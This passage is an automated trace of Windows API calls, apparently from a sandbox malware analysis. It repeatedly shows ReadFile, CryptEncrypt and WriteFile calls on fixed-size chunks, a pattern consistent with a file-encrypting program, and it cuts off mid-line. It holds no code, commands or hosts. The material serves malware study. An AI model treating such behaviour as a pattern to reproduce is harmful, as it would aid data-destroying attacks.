[0258.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.426] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.427] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.427] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.427] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.427] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.427] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.428] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.428] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.428] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.428] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.428] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.429] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.429] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.430] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.431] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.431] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 